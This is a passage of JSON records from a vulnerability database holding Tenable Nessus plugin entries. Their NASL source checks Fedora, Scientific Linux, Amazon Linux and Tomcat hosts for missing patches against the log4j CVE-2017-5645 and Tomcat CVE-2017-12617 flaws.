"cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:56:34", "description": "Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-13T00:00:00", "type": "nessus", "title": "Fedora 25 : log4j12 (2017-8348115acd)", 
"bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:log4j12", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-8348115ACD.NASL", "href": "https://www.tenable.com/plugins/nessus/100746", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-8348115acd.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100746);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-5645\");\n script_xref(name:\"FEDORA\", value:\"2017-8348115acd\");\n\n script_name(english:\"Fedora 25 : log4j12 (2017-8348115acd)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-8348115acd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected log4j12 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:log4j12\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"log4j12-1.2.17-19.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j12\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:58:58", "description": "Security Fix(es) :\n\n - It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application. 
(CVE-2017-5645)", "cvss3": {}, "published": "2017-08-22T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : log4j on SL7.x (noarch) (20170807)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:log4j", "p-cpe:/a:fermilab:scientific_linux:log4j-javadoc", "p-cpe:/a:fermilab:scientific_linux:log4j-manual", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20170807_LOG4J_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/102666", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102666);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-5645\");\n\n script_name(english:\"Scientific Linux Security Update : log4j on SL7.x (noarch) (20170807)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - It was found that when using remote logging with log4j\n socket server the log4j server would deserialize any log\n event received via TCP or UDP. An attacker could use\n this flaw to send a specially crafted log event that,\n during deserialization, would execute arbitrary code in\n the context of the logger application. 
(CVE-2017-5645)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1708&L=scientific-linux-errata&F=&S=&P=5404\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?20734978\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected log4j, log4j-javadoc and / or log4j-manual\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:log4j-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:log4j-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", reference:\"log4j-1.2.17-16.el7_4\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"log4j-javadoc-1.2.17-16.el7_4\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"log4j-manual-1.2.17-16.el7_4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j / log4j-javadoc / log4j-manual\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:02:24", "description": "The version of Apache Tomcat installed on the remote host is 9.0.0.M1 or 
later but prior to 9.0.1. It is, therefore, affected by an unspecified vulnerability when running with HTTP PUTs enabled (e.g. via setting the readonly initialization parameter of the Default servlet to false) that makes it possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.\n\nNote that Nessus has not attempted to exploit this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-10-06T00:00:00", "type": "nessus", "title": "Apache Tomcat 9.0.0.M1 < 9.0.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12617"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_9_0_1.NASL", "href": "https://www.tenable.com/plugins/nessus/103699", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103699);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2017-12617\");\n script_bugtraq_id(100954);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Apache Tomcat 9.0.0.M1 < 9.0.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 9.0.0.M1\nor later but prior to 9.0.1. 
It is, therefore, affected by an\nunspecified vulnerability when running with HTTP PUTs enabled (e.g.\nvia setting the readonly initialization parameter of the Default to\nfalse) that makes it possible to upload a JSP file to the server via\na specially crafted request. This JSP could then be requested and any\ncode it contained would be executed by the server.\n\nNote that Nessus has not attempted to exploit this issue but has\ninstead relied only on the application's self-reported version number.\");\n # https://lists.apache.org/thread.html/3fd341a604c4e9eab39e7eaabbbac39c30101a022acc11dd09d7ebcb@%3Cannounce.tomcat.apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f047e41\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 9.0.1 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12617\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\ntomcat_check_version(fixed:\"9.0.1\", min:\"9.0.0.M1\", severity:SECURITY_WARNING, granularity_regex:\"^9(\\.0)?$\");\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:13:12", "description": "The version of Apache Tomcat installed on the remote host is 8.0.0.RC1 or later but prior to 8.0.47. It is, therefore, affected by an unspecified vulnerability when running with HTTP PUTs enabled (e.g. via setting the readonly initialization parameter of the Default servlet to false) that makes it possible to upload a JSP file to the server via a specially crafted request. 
This JSP could then be requested and any code it contained would be executed by the server.\n\nNote that Nessus has not attempted to exploit this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-10-06T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.0.0.RC1 < 8.0.47 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12617"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_8_0_47.NASL", "href": "https://www.tenable.com/plugins/nessus/103697", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103697);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2017-12617\");\n script_bugtraq_id(100954);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Apache Tomcat 8.0.0.RC1 < 8.0.47 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is\n8.0.0.RC1 or later but prior to 8.0.47. It is, therefore, affected by\nan unspecified vulnerability when running with HTTP PUTs enabled (e.g.\nvia setting the readonly initialization parameter of the Default to\nfalse) that makes it possible to upload a JSP file to the server via a\nspecially crafted request. 
This JSP could then be requested and any\ncode it contained would be executed by the server.\n\nNote that Nessus has not attempted to exploit this issue but has\ninstead relied only on the application's self-reported version number.\");\n # https://lists.apache.org/thread.html/3fd341a604c4e9eab39e7eaabbbac39c30101a022acc11dd09d7ebcb@%3Cannounce.tomcat.apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f047e41\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 8.0.47 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12617\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/06\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\ntomcat_check_version(fixed:\"8.0.47\", min:\"8.0.0.RC1\", severity:SECURITY_WARNING, granularity_regex:\"^8\\.0\\.$\");\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:01:42", "description": "A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. 
(CVE-2017-12617)", "cvss3": {}, "published": "2017-10-27T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : tomcat8 / tomcat80,tomcat7 (ALAS-2017-913)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12617"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat7", "p-cpe:/a:amazon:linux:tomcat7-admin-webapps", "p-cpe:/a:amazon:linux:tomcat7-docs-webapp", "p-cpe:/a:amazon:linux:tomcat7-el-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-javadoc", "p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-lib", "p-cpe:/a:amazon:linux:tomcat7-log4j", "p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api", "p-cpe:/a:amazon:linux:tomcat7-webapps", "p-cpe:/a:amazon:linux:tomcat8", "p-cpe:/a:amazon:linux:tomcat8-admin-webapps", "p-cpe:/a:amazon:linux:tomcat8-docs-webapp", "p-cpe:/a:amazon:linux:tomcat8-el-3.0-api", "p-cpe:/a:amazon:linux:tomcat8-javadoc", "p-cpe:/a:amazon:linux:tomcat8-jsp-2.3-api", "p-cpe:/a:amazon:linux:tomcat8-lib", "p-cpe:/a:amazon:linux:tomcat8-log4j", "p-cpe:/a:amazon:linux:tomcat8-servlet-3.1-api", "p-cpe:/a:amazon:linux:tomcat8-webapps", "p-cpe:/a:amazon:linux:tomcat80", "p-cpe:/a:amazon:linux:tomcat80-admin-webapps", "p-cpe:/a:amazon:linux:tomcat80-docs-webapp", "p-cpe:/a:amazon:linux:tomcat80-el-3.0-api", "p-cpe:/a:amazon:linux:tomcat80-javadoc", "p-cpe:/a:amazon:linux:tomcat80-jsp-2.3-api", "p-cpe:/a:amazon:linux:tomcat80-lib", "p-cpe:/a:amazon:linux:tomcat80-log4j", "p-cpe:/a:amazon:linux:tomcat80-servlet-3.1-api", "p-cpe:/a:amazon:linux:tomcat80-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-913.NASL", "href": "https://www.tenable.com/plugins/nessus/104179", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-913.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104179);\n 
script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2017-12617\");\n script_xref(name:\"ALAS\", value:\"2017-913\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Amazon Linux AMI : tomcat8 / tomcat80,tomcat7 (ALAS-2017-913)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"A vulnerability was discovered in Tomcat where if a servlet context\nwas configured with readonly=false and HTTP PUT requests were allowed,\nan attacker could upload a JSP file to that context and achieve code\nexecution. (CVE-2017-12617)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2017-913.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update tomcat8' to update your system.\n\nRun 'yum update tomcat80' to update your system.\n\nRun 'yum update tomcat7' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-lib\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat80-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-admin-webapps-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-docs-webapp-7.0.82-1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 